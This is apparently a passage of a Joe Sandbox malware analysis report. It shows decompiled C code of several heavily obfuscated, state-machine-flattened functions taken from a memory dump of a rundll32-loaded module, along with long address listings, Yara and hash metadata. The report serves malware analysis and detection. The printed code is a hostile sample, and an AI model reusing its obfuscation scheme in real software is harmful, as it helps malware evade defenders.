				_v128 = _v128 ^ 0x275b8ca8;
				_v136 = 0x1b49e9;
				_v136 = _v136 * 0x22;
				_v136 = _v136 ^ 0x6bc19a50;
				_v136 = _v136 ^ 0xda04c504;
				_v136 = _v136 ^ 0xb25c1cc6;
				do {
					while(_t280 != 0x9b6c7ef) {
						if(_t280 == 0xd3d1227) {
							_t280 = 0x9b6c7ef;
							continue;
						} else {
							if(_t280 == 0xd8aa277) {
								E007A9008(_v72, _v128, _v136);
							} else {
								_t317 = _t280 - 0xdb35d55;
								if(_t280 != 0xdb35d55) {
									goto L10;
								} else {
									_push(_v164);
									_push(_v132);
									_t308 = 0x44;
									E00794B61( &_v68, _t308);
									_push(_v92);
									_v68 = _t308;
									_push(_v156);
									_t284 = _v76;
									_v60 = E007ADCF7(_v76, 0x79173c, _t317);
									_t307 = E007ADE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
									E0079A8B0(_v144, _v60, _v112);
									_t311 =  &(_t311[0x19]);
									_t280 = 0xd8aa277;
									continue;
								}
							}
						}
						L13:
						return _t307;
					}
					_t263 = E00794241(_t280, _v120,  &_v72, _a28, _v104);
					_t311 =  &(_t311[3]);
					__eflags = _t263;
					if(_t263 == 0) {
						_t280 = 0xcb447d9;
						goto L10;
					} else {
						_t280 = 0xdb35d55;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t280 - 0xcb447d9;
				} while (_t280 != 0xcb447d9);
				goto L13;
			}












































                                                                                                                          0x007ad393
                                                                                                                          0x007ad39c
                                                                                                                          0x007ad39e
                                                                                                                          0x007ad3a5
                                                                                                                          0x007ad3a6
                                                                                                                          0x007ad3ad
                                                                                                                          0x007ad3b4
                                                                                                                          0x007ad3b5
                                                                                                                          0x007ad3bc
                                                                                                                          0x007ad3be
                                                                                                                          0x007ad3c3
                                                                                                                          0x007ad3ca
                                                                                                                          0x007ad3cd
                                                                                                                          0x007ad3d5
                                                                                                                          0x007ad3d7
                                                                                                                          0x007ad3e1
                                                                                                                          0x007ad3e9
                                                                                                                          0x007ad3ee
                                                                                                                          0x007ad3f6
                                                                                                                          0x007ad3fb
                                                                                                                          0x007ad403
                                                                                                                          0x007ad40b
                                                                                                                          0x007ad413
                                                                                                                          0x007ad41b
                                                                                                                          0x007ad41f
                                                                                                                          0x007ad427
                                                                                                                          0x007ad42f
                                                                                                                          0x007ad434
                                                                                                                          0x007ad439
                                                                                                                          0x007ad441
                                                                                                                          0x007ad449
                                                                                                                          0x007ad44d
                                                                                                                          0x007ad455
                                                                                                                          0x007ad45d
                                                                                                                          0x007ad465
                                                                                                                          0x007ad46d
                                                                                                                          0x007ad475
                                                                                                                          0x007ad480
                                                                                                                          0x007ad485
                                                                                                                          0x007ad48b
                                                                                                                          0x007ad493
                                                                                                                          0x007ad49b
                                                                                                                          0x007ad49f
                                                                                                                          0x007ad4a7
                                                                                                                          0x007ad4af
                                                                                                                          0x007ad4b7
                                                                                                                          0x007ad4bf
                                                                                                                          0x007ad4c7
                                                                                                                          0x007ad4cf
                                                                                                                          0x007ad4d7
                                                                                                                          0x007ad4df
                                                                                                                          0x007ad4e7
                                                                                                                          0x007ad4f4
                                                                                                                          0x007ad4f5
                                                                                                                          0x007ad4f9
                                                                                                                          0x007ad4fe
                                                                                                                          0x007ad506
                                                                                                                          0x007ad50e
                                                                                                                          0x007ad51c
                                                                                                                          0x007ad525
                                                                                                                          0x007ad529
                                                                                                                          0x007ad531
                                                                                                                          0x007ad539
                                                                                                                          0x007ad53e
                                                                                                                          0x007ad546
                                                                                                                          0x007ad54e
                                                                                                                          0x007ad558
                                                                                                                          0x007ad565
                                                                                                                          0x007ad570
                                                                                                                          0x007ad575
                                                                                                                          0x007ad57b
                                                                                                                          0x007ad583
                                                                                                                          0x007ad58b
                                                                                                                          0x007ad58f
                                                                                                                          0x007ad594
                                                                                                                          0x007ad59c
                                                                                                                          0x007ad5a4
                                                                                                                          0x007ad5ac
                                                                                                                          0x007ad5b4
                                                                                                                          0x007ad5bc
                                                                                                                          0x007ad5c4
                                                                                                                          0x007ad5cc
                                                                                                                          0x007ad5d4
                                                                                                                          0x007ad5dc
                                                                                                                          0x007ad5e4
                                                                                                                          0x007ad5ec
                                                                                                                          0x007ad5f0
                                                                                                                          0x007ad5f8
                                                                                                                          0x007ad600
                                                                                                                          0x007ad608
                                                                                                                          0x007ad610
                                                                                                                          0x007ad618
                                                                                                                          0x007ad620
                                                                                                                          0x007ad628
                                                                                                                          0x007ad630
                                                                                                                          0x007ad638
                                                                                                                          0x007ad63d
                                                                                                                          0x007ad645
                                                                                                                          0x007ad64a
                                                                                                                          0x007ad652
                                                                                                                          0x007ad65a
                                                                                                                          0x007ad662
                                                                                                                          0x007ad667
                                                                                                                          0x007ad671
                                                                                                                          0x007ad676
                                                                                                                          0x007ad67c
                                                                                                                          0x007ad684
                                                                                                                          0x007ad690
                                                                                                                          0x007ad698
                                                                                                                          0x007ad69c
                                                                                                                          0x007ad6a4
                                                                                                                          0x007ad6ac
                                                                                                                          0x007ad6b4
                                                                                                                          0x007ad6bc
                                                                                                                          0x007ad6c9
                                                                                                                          0x007ad6cd
                                                                                                                          0x007ad6d5
                                                                                                                          0x007ad6e2
                                                                                                                          0x007ad6e6
                                                                                                                          0x007ad6ee
                                                                                                                          0x007ad6f6
                                                                                                                          0x007ad6fe
                                                                                                                          0x007ad6fe
                                                                                                                          0x007ad70c
                                                                                                                          0x007ad7ec
                                                                                                                          0x00000000
                                                                                                                          0x007ad712
                                                                                                                          0x007ad718
                                                                                                                          0x007ad839
                                                                                                                          0x007ad71e
                                                                                                                          0x007ad71e
                                                                                                                          0x007ad720
                                                                                                                          0x00000000
                                                                                                                          0x007ad726
                                                                                                                          0x007ad726
                                                                                                                          0x007ad72e
                                                                                                                          0x007ad734
                                                                                                                          0x007ad737
                                                                                                                          0x007ad73c
                                                                                                                          0x007ad745
                                                                                                                          0x007ad74c
                                                                                                                          0x007ad750
                                                                                                                          0x007ad75c
                                                                                                                          0x007ad7d4
                                                                                                                          0x007ad7da
                                                                                                                          0x007ad7df
                                                                                                                          0x007ad7e2
                                                                                                                          0x00000000
                                                                                                                          0x007ad7e2
                                                                                                                          0x007ad720
                                                                                                                          0x007ad718
                                                                                                                          0x007ad840
                                                                                                                          0x007ad84b
                                                                                                                          0x007ad84b
                                                                                                                          0x007ad807
                                                                                                                          0x007ad80c
                                                                                                                          0x007ad80f
                                                                                                                          0x007ad811
                                                                                                                          0x007ad81a
                                                                                                                          0x00000000
                                                                                                                          0x007ad813
                                                                                                                          0x007ad813
                                                                                                                          0x00000000
                                                                                                                          0x007ad813
                                                                                                                          0x00000000
                                                                                                                          0x007ad81f
                                                                                                                          0x007ad81f
                                                                                                                          0x007ad81f
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: T.~$hc$ru$($0$K<
                                                                                                                          • API String ID: 0-2343433060
                                                                                                                          • Opcode ID: dfecaf751c68469c63f122bd6ac3ced4cf44615f3853725add2a6872de16ccf6
                                                                                                                          • Instruction ID: f6e59b37752556ce0e898c8208122abb340ba896b5a458f1c64d5d9c9f70d558
                                                                                                                          • Opcode Fuzzy Hash: dfecaf751c68469c63f122bd6ac3ced4cf44615f3853725add2a6872de16ccf6
                                                                                                                          • Instruction Fuzzy Hash: E4C134725087809FD768CF25C94AA5BFBE1FBD5744F104A1DF29A96260C7B68908CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00793E3F Relevance: 7.7, Strings: 6, Instructions: 217COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E00793E3F() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t213;
				signed int _t214;
				void* _t216;
				signed int _t222;
				intOrPtr _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				void* _t230;
				void* _t236;
				void* _t257;
				signed int* _t261;

				_t261 =  &_v100;
				_v8 = 0xc74bd8;
				_v4 = 0;
				_v72 = 0x3d4417;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xffff33fd;
				_v72 = _v72 ^ 0xbd434afc;
				_v32 = 0xa9ac19;
				_v32 = _v32 + 0x4aca;
				_v32 = _v32 ^ 0x00a9f6e1;
				_v40 = 0x1f6a8;
				_v12 = 0;
				_v40 = _v40 * 0x6f;
				_t257 = 0xf52a3f4;
				_v40 = _v40 ^ 0x00d19880;
				_v44 = 0x168b17;
				_v44 = _v44 + 0x13a5;
				_v44 = _v44 ^ 0x001ee95f;
				_v48 = 0xfac2ed;
				_v48 = _v48 + 0xffff2a35;
				_v48 = _v48 ^ 0x00fbd9f9;
				_v92 = 0xc00c53;
				_v92 = _v92 + 0xffff1aa9;
				_v92 = _v92 + 0xf2d7;
				_t225 = 0x68;
				_v92 = _v92 / _t225;
				_v92 = _v92 ^ 0x0000565c;
				_v68 = 0xf2ac97;
				_v68 = _v68 ^ 0x99fc0549;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000a8804;
				_v24 = 0xf89d13;
				_t226 = 0x49;
				_v24 = _v24 / _t226;
				_v24 = _v24 ^ 0x000ed122;
				_v96 = 0x9976f7;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0xdd1af6ea;
				_v96 = _v96 ^ 0x684d855d;
				_v96 = _v96 ^ 0xb5551d4c;
				_v28 = 0x12a2d6;
				_t227 = 0xe;
				_v28 = _v28 * 0x29;
				_v28 = _v28 ^ 0x02ffade5;
				_v100 = 0x1d8880;
				_v100 = _v100 + 0x8a1e;
				_v100 = _v100 * 0x7c;
				_v100 = _v100 + 0xffff421a;
				_v100 = _v100 ^ 0x0e9f1559;
				_v36 = 0x784079;
				_v36 = _v36 / _t227;
				_v36 = _v36 ^ 0x0007caf6;
				_v60 = 0xd037f8;
				_v60 = _v60 >> 0xf;
				_v60 = _v60 + 0xfffff3b4;
				_v60 = _v60 ^ 0xfff3df4e;
				_v64 = 0x95f516;
				_v64 = _v64 + 0xffffc55a;
				_v64 = _v64 | 0x523f0ae6;
				_v64 = _v64 ^ 0x52b19695;
				_v84 = 0x271827;
				_v84 = _v84 + 0xffff7017;
				_v84 = _v84 + 0x1e15;
				_v84 = _v84 ^ 0xa1c53b6b;
				_v84 = _v84 ^ 0xa1e64a9e;
				_v52 = 0x3d5883;
				_v52 = _v52 >> 5;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x000b56f4;
				_v56 = 0xd5acf2;
				_v56 = _v56 ^ 0x15c9a5cd;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0xa8e6808a;
				_v88 = 0xcc2476;
				_v88 = _v88 + 0x4ceb;
				_v88 = _v88 ^ 0xdbab884b;
				_t228 = 0x4f;
				_v88 = _v88 / _t228;
				_v88 = _v88 ^ 0x02ce2d39;
				_v20 = 0x9b21e;
				_v20 = _v20 + 0x218b;
				_v20 = _v20 ^ 0x00037084;
				_v76 = 0xcba48;
				_t229 = 0x5a;
				_t222 = _v12;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0x3acc;
				_v76 = _v76 << 0x10;
				_v76 = _v76 ^ 0xbb6cb0a9;
				_v80 = 0x9c886e;
				_v80 = _v80 ^ 0x88757b42;
				_t230 = 0x5c;
				_v80 = _v80 / _t229;
				_v80 = _v80 << 0xe;
				_v80 = _v80 ^ 0x5c6ae118;
				while(1) {
					L1:
					_t213 = 0xa360d2e;
					do {
						while(_t257 != _t213) {
							if(_t257 == 0xb87cfc3) {
								_t223 =  *0x7b3e10; // 0x0
								_t224 = _t223 + 0x1c;
								while(1) {
									__eflags =  *_t224 - _t230;
									if(__eflags == 0) {
										break;
									}
									_t224 = _t224 + 2;
									__eflags = _t224;
								}
								_t222 = _t224 + 2;
								_t257 = 0xc7301de;
								goto L1;
							} else {
								if(_t257 == 0xc7301de) {
									_push(_v48);
									_push(_v44);
									_t216 = E007ADCF7(_v40, 0x791080, __eflags);
									_pop(_t236);
									__eflags = E0079AAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
									E0079A8B0(_v60, _t216, _v64);
									_t261 =  &(_t261[0xf]);
									L14:
									_t213 = 0xa360d2e;
									_t230 = 0x5c;
									goto L15;
								} else {
									if(_t257 == 0xdd28c3f) {
										E00791FD1(_v20, _v76, _v80, _v16);
									} else {
										if(_t257 != 0xf52a3f4) {
											goto L15;
										} else {
											_t257 = 0xb87cfc3;
											continue;
										}
									}
								}
							}
							L18:
							return _v12;
						}
						_t214 = E00791F53(_v16, _v84, _v52, _t222, _v56, _v88);
						_t261 =  &(_t261[4]);
						__eflags = _t214;
						_t257 = 0xdd28c3f;
						_t191 = _t214 == 0;
						__eflags = _t191;
						_v12 = 0 | _t191;
						goto L14;
						L15:
						__eflags = _t257 - 0x57f878b;
					} while (__eflags != 0);
					goto L18;
				}
			}











































                                                                                                                          0x00793e3f
                                                                                                                          0x00793e42
                                                                                                                          0x00793e4c
                                                                                                                          0x00793e52
                                                                                                                          0x00793e5a
                                                                                                                          0x00793e5f
                                                                                                                          0x00793e67
                                                                                                                          0x00793e6f
                                                                                                                          0x00793e77
                                                                                                                          0x00793e7f
                                                                                                                          0x00793e87
                                                                                                                          0x00793e8f
                                                                                                                          0x00793e9c
                                                                                                                          0x00793ea0
                                                                                                                          0x00793ea5
                                                                                                                          0x00793ead
                                                                                                                          0x00793eb5
                                                                                                                          0x00793ebd
                                                                                                                          0x00793ec5
                                                                                                                          0x00793ecd
                                                                                                                          0x00793ed5
                                                                                                                          0x00793edd
                                                                                                                          0x00793ee5
                                                                                                                          0x00793eed
                                                                                                                          0x00793efb
                                                                                                                          0x00793f00
                                                                                                                          0x00793f06
                                                                                                                          0x00793f0e
                                                                                                                          0x00793f16
                                                                                                                          0x00793f1e
                                                                                                                          0x00793f23
                                                                                                                          0x00793f2b
                                                                                                                          0x00793f37
                                                                                                                          0x00793f3c
                                                                                                                          0x00793f42
                                                                                                                          0x00793f4a
                                                                                                                          0x00793f52
                                                                                                                          0x00793f57
                                                                                                                          0x00793f5f
                                                                                                                          0x00793f67
                                                                                                                          0x00793f6f
                                                                                                                          0x00793f7c
                                                                                                                          0x00793f7d
                                                                                                                          0x00793f81
                                                                                                                          0x00793f89
                                                                                                                          0x00793f91
                                                                                                                          0x00793f9e
                                                                                                                          0x00793fa2
                                                                                                                          0x00793faa
                                                                                                                          0x00793fb2
                                                                                                                          0x00793fc0
                                                                                                                          0x00793fc4
                                                                                                                          0x00793fcc
                                                                                                                          0x00793fd4
                                                                                                                          0x00793fd9
                                                                                                                          0x00793fe1
                                                                                                                          0x00793fe9
                                                                                                                          0x00793ff1
                                                                                                                          0x00793ff9
                                                                                                                          0x00794001
                                                                                                                          0x00794009
                                                                                                                          0x00794011
                                                                                                                          0x00794019
                                                                                                                          0x00794023
                                                                                                                          0x00794030
                                                                                                                          0x00794038
                                                                                                                          0x00794040
                                                                                                                          0x00794045
                                                                                                                          0x0079404a
                                                                                                                          0x00794052
                                                                                                                          0x0079405a
                                                                                                                          0x00794062
                                                                                                                          0x00794067
                                                                                                                          0x0079406f
                                                                                                                          0x00794077
                                                                                                                          0x0079407f
                                                                                                                          0x0079408d
                                                                                                                          0x00794092
                                                                                                                          0x00794098
                                                                                                                          0x007940a0
                                                                                                                          0x007940a8
                                                                                                                          0x007940b0
                                                                                                                          0x007940b8
                                                                                                                          0x007940c5
                                                                                                                          0x007940c6
                                                                                                                          0x007940cc
                                                                                                                          0x007940d0
                                                                                                                          0x007940d8
                                                                                                                          0x007940dd
                                                                                                                          0x007940e5
                                                                                                                          0x007940ed
                                                                                                                          0x007940fb
                                                                                                                          0x007940fc
                                                                                                                          0x00794100
                                                                                                                          0x00794105
                                                                                                                          0x0079410d
                                                                                                                          0x0079410d
                                                                                                                          0x0079410d
                                                                                                                          0x00794112
                                                                                                                          0x00794112
                                                                                                                          0x0079411c
                                                                                                                          0x007941bb
                                                                                                                          0x007941c1
                                                                                                                          0x007941c9
                                                                                                                          0x007941c9
                                                                                                                          0x007941cc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007941c6
                                                                                                                          0x007941c6
                                                                                                                          0x007941c6
                                                                                                                          0x007941ce
                                                                                                                          0x007941d1
                                                                                                                          0x00000000
                                                                                                                          0x00794122
                                                                                                                          0x00794128
                                                                                                                          0x00794146
                                                                                                                          0x0079414f
                                                                                                                          0x00794157
                                                                                                                          0x0079415d
                                                                                                                          0x007941a0
                                                                                                                          0x007941ae
                                                                                                                          0x007941b1
                                                                                                                          0x007941b6
                                                                                                                          0x00794208
                                                                                                                          0x0079420a
                                                                                                                          0x0079420f
                                                                                                                          0x00000000
                                                                                                                          0x0079412a
                                                                                                                          0x00794130
                                                                                                                          0x0079422e
                                                                                                                          0x00794136
                                                                                                                          0x0079413c
                                                                                                                          0x00000000
                                                                                                                          0x00794142
                                                                                                                          0x00794142
                                                                                                                          0x00000000
                                                                                                                          0x00794142
                                                                                                                          0x0079413c
                                                                                                                          0x00794130
                                                                                                                          0x00794128
                                                                                                                          0x00794235
                                                                                                                          0x00794240
                                                                                                                          0x00794240
                                                                                                                          0x007941f0
                                                                                                                          0x007941f7
                                                                                                                          0x007941fa
                                                                                                                          0x007941fc
                                                                                                                          0x00794201
                                                                                                                          0x00794201
                                                                                                                          0x00794204
                                                                                                                          0x00000000
                                                                                                                          0x00794210
                                                                                                                          0x00794210
                                                                                                                          0x00794210
                                                                                                                          0x00000000
                                                                                                                          0x0079421c

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: .6$.6$.6$y@x$?R$L
                                                                                                                          • API String ID: 0-3177096336
                                                                                                                          • Opcode ID: 24da77cfbb762901e6037609256032b937e94a7afb19334b7784b5f6e904188a
                                                                                                                          • Instruction ID: 3644c31bde0c7728bd48e5bcf87933ef3d4c0152ddb025fe3c6706f2acd200c3
                                                                                                                          • Opcode Fuzzy Hash: 24da77cfbb762901e6037609256032b937e94a7afb19334b7784b5f6e904188a
                                                                                                                          • Instruction Fuzzy Hash: CDA130B25083409FD758CF65D88A81BBBF1FBD4758F108A1DF19586260D3B5894ACF87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079B74D Relevance: 7.7, Strings: 6, Instructions: 217COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E0079B74D(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t231;
				intOrPtr _t232;
				intOrPtr _t233;
				void* _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t266;
				void* _t267;
				signed int* _t270;
				signed int* _t271;

				_t270 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0x6c2b32;
				_v8 = 0x58b11;
				_v64 = 0x37f8ee;
				_v64 = _v64 + 0xffff6702;
				_v64 = _v64 ^ 0xad40df3f;
				_v64 = _v64 ^ 0xad79282c;
				_v100 = 0x6d524;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 + 0x2921;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00050ee9;
				_v28 = 0x9e9a;
				_t266 = __edx;
				_t237 = __ecx;
				_t267 = 0x52ffaa2;
				_t239 = 0xb;
				_v28 = _v28 / _t239;
				_v28 = _v28 ^ 0x00028e70;
				_v32 = 0x2476b5;
				_t240 = 0x6f;
				_v32 = _v32 / _t240;
				_v32 = _v32 ^ 0x0008b44d;
				_v60 = 0x9e7d2d;
				_v60 = _v60 >> 0xc;
				_v60 = _v60 << 0xe;
				_v60 = _v60 ^ 0x02752993;
				_v24 = 0xe09194;
				_t241 = 0x44;
				_v24 = _v24 / _t241;
				_v24 = _v24 ^ 0x0009703f;
				_v96 = 0x854eb1;
				_v96 = _v96 + 0xc1c6;
				_v96 = _v96 * 0x1a;
				_v96 = _v96 | 0x594c04b7;
				_v96 = _v96 ^ 0x5dd9e9b5;
				_v20 = 0x86d30b;
				_v20 = _v20 | 0xe45dff90;
				_v20 = _v20 ^ 0xe4d4624e;
				_v92 = 0x8501b9;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x2f;
				_v92 = _v92 + 0xe9ed;
				_v92 = _v92 ^ 0x0060653e;
				_v52 = 0xaa921f;
				_v52 = _v52 ^ 0x3dfd2146;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x1ea8ab64;
				_v56 = 0x2765e6;
				_v56 = _v56 ^ 0x5c8ea534;
				_v56 = _v56 | 0xccee86e2;
				_v56 = _v56 ^ 0xdcebf872;
				_v88 = 0x89b797;
				_v88 = _v88 + 0x84ba;
				_v88 = _v88 + 0xc14;
				_v88 = _v88 | 0xbe23ba3f;
				_v88 = _v88 ^ 0xbea6e118;
				_v48 = 0x866a1d;
				_v48 = _v48 >> 9;
				_v48 = _v48 * 0x16;
				_v48 = _v48 ^ 0x0007ec78;
				_v16 = 0x7d5d8a;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000578c4;
				_v68 = 0x2c77b1;
				_v68 = _v68 | 0xad369f51;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0xdff48475;
				_v72 = 0x3ef83;
				_v72 = _v72 << 3;
				_v72 = _v72 + 0xb46;
				_v72 = _v72 ^ 0x001ba742;
				_v76 = 0x4a0f2c;
				_t242 = 0x6a;
				_v76 = _v76 * 0x54;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x33e29f20;
				_v36 = 0x9fb368;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x000f389a;
				_v40 = 0x5cfe3a;
				_v40 = _v40 + 0x27ff;
				_v40 = _v40 ^ 0x005ee30c;
				_v104 = 0xfd26ea;
				_v104 = _v104 << 9;
				_v104 = _v104 + 0xffff1095;
				_v104 = _v104 + 0xffffd24c;
				_v104 = _v104 ^ 0xfa4b2973;
				_v80 = 0xbb493f;
				_v80 = _v80 + 0x4ae2;
				_v80 = _v80 | 0xbb4dbcb8;
				_v80 = _v80 + 0x3bc7;
				_v80 = _v80 ^ 0xbbf0b3fa;
				_v44 = 0xfc3c2e;
				_v44 = _v44 << 0x10;
				_v44 = _v44 + 0xffff4208;
				_v44 = _v44 ^ 0x3c281d99;
				_v84 = 0xc50344;
				_v84 = _v84 | 0xb9ed19f4;
				_v84 = _v84 / _t242;
				_t243 = 0x6b;
				_v84 = _v84 / _t243;
				_v84 = _v84 ^ 0x000f16db;
				while(1) {
					L1:
					_t231 = 0xc3f018b;
					do {
						L2:
						while(_t267 != 0x52ffaa2) {
							if(_t267 == 0x865547f) {
								_t243 = _v88;
								_t232 = E0079CDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
								_t270 =  &(_t270[2]);
								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
								__eflags = _t232;
								_t231 = 0xc3f018b;
								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t267 == 0xb133873) {
								_push(_v32);
								_t233 = E007AC3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
								_t271 =  &(_t270[4]);
								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
								__eflags = _t233;
								if(_t233 != 0) {
									E00797B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
									_push( *((intOrPtr*)(_t266 + 0x38)));
									_push(_v56);
									_push(_v52);
									_t243 = _v20;
									E00797C37(_v20, _v92);
									_t270 =  &(_t271[6]);
									_t267 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t267 == 0xb7a2405) {
									return E007A9E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
								}
								if(_t267 != _t231) {
									goto L13;
								} else {
									_t233 = E007946BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E00794C5D, _v104);
									_t270 =  &(_t270[0xa]);
									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
									if(_t233 == 0) {
										_t267 = 0xb7a2405;
										while(1) {
											L1:
											_t231 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t233;
						}
						_t267 = 0xb133873;
						L13:
						__eflags = _t267 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t231;
				}
			}









































                                                                                                                          0x0079b74d
                                                                                                                          0x0079b750
                                                                                                                          0x0079b755
                                                                                                                          0x0079b75d
                                                                                                                          0x0079b765
                                                                                                                          0x0079b76d
                                                                                                                          0x0079b775
                                                                                                                          0x0079b77d
                                                                                                                          0x0079b785
                                                                                                                          0x0079b78d
                                                                                                                          0x0079b792
                                                                                                                          0x0079b79a
                                                                                                                          0x0079b79f
                                                                                                                          0x0079b7a7
                                                                                                                          0x0079b7b7
                                                                                                                          0x0079b7b9
                                                                                                                          0x0079b7bf
                                                                                                                          0x0079b7c4
                                                                                                                          0x0079b7c9
                                                                                                                          0x0079b7cf
                                                                                                                          0x0079b7d7
                                                                                                                          0x0079b7e3
                                                                                                                          0x0079b7e8
                                                                                                                          0x0079b7ee
                                                                                                                          0x0079b7f6
                                                                                                                          0x0079b7fe
                                                                                                                          0x0079b803
                                                                                                                          0x0079b808
                                                                                                                          0x0079b810
                                                                                                                          0x0079b81c
                                                                                                                          0x0079b81f
                                                                                                                          0x0079b823
                                                                                                                          0x0079b82b
                                                                                                                          0x0079b833
                                                                                                                          0x0079b840
                                                                                                                          0x0079b844
                                                                                                                          0x0079b84c
                                                                                                                          0x0079b854
                                                                                                                          0x0079b85c
                                                                                                                          0x0079b864
                                                                                                                          0x0079b86c
                                                                                                                          0x0079b874
                                                                                                                          0x0079b87e
                                                                                                                          0x0079b882
                                                                                                                          0x0079b88a
                                                                                                                          0x0079b892
                                                                                                                          0x0079b89a
                                                                                                                          0x0079b8a2
                                                                                                                          0x0079b8a6
                                                                                                                          0x0079b8ae
                                                                                                                          0x0079b8b6
                                                                                                                          0x0079b8be
                                                                                                                          0x0079b8c6
                                                                                                                          0x0079b8ce
                                                                                                                          0x0079b8d6
                                                                                                                          0x0079b8de
                                                                                                                          0x0079b8e6
                                                                                                                          0x0079b8ee
                                                                                                                          0x0079b8f6
                                                                                                                          0x0079b8fe
                                                                                                                          0x0079b908
                                                                                                                          0x0079b90c
                                                                                                                          0x0079b914
                                                                                                                          0x0079b91c
                                                                                                                          0x0079b923
                                                                                                                          0x0079b930
                                                                                                                          0x0079b938
                                                                                                                          0x0079b940
                                                                                                                          0x0079b945
                                                                                                                          0x0079b94d
                                                                                                                          0x0079b955
                                                                                                                          0x0079b95a
                                                                                                                          0x0079b962
                                                                                                                          0x0079b96a
                                                                                                                          0x0079b979
                                                                                                                          0x0079b97c
                                                                                                                          0x0079b980
                                                                                                                          0x0079b985
                                                                                                                          0x0079b98d
                                                                                                                          0x0079b995
                                                                                                                          0x0079b99a
                                                                                                                          0x0079b9a2
                                                                                                                          0x0079b9aa
                                                                                                                          0x0079b9b2
                                                                                                                          0x0079b9ba
                                                                                                                          0x0079b9c2
                                                                                                                          0x0079b9c7
                                                                                                                          0x0079b9cf
                                                                                                                          0x0079b9d7
                                                                                                                          0x0079b9df
                                                                                                                          0x0079b9e7
                                                                                                                          0x0079b9ef
                                                                                                                          0x0079b9f7
                                                                                                                          0x0079b9ff
                                                                                                                          0x0079ba07
